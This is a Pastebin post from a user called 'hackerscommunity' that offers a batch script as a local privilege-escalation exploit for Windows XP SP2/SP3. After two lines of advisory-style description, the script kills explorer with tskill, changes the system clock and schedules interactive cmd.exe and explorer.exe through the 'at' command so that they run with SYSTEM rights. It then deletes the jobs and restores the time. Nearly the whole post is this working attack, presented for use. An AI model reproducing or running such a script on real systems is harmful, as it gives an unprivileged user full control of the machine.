Advertisement
hackerscommunity

MS Windows XP 'tskill' local privilege escalation exploit

Jul 11th, 2015
398
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.92 KB | None | 0 0
  1. Microsoft Windows is prone to a local privilege-escalation vulnerability.
  2.  
  3. A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
  4.  
  5. @echo off
  6. echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
  7. start time /T > time.txt
  8. tskill explorer
  9. time 13:36:59 > nul
  10. at 13:37 /interactive cmd.exe
  11. at 13:37 /interactive explorer.exe
  12. at 13:37 /interactive at /del /y
  13. cls
  14. at 13:37 /interactive cmd.exe
  15. at 13:37 /interactive explorer.exe
  16. at 13:37 /interactive at /del /y
  17. cls
  18. at 13:37 /interactive cmd.exe
  19. at 13:37 /interactive explorer.exe
  20. at 13:37 /interactive at /del /y
  21. cls
  22. at 13:37 /interactive cmd.exe
  23. at 13:37 /interactive explorer.exe
  24. at 13:37 /interactive at /del /y
  25.  
  26.  
  27. echo [*] Backup time
  28. time < time.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement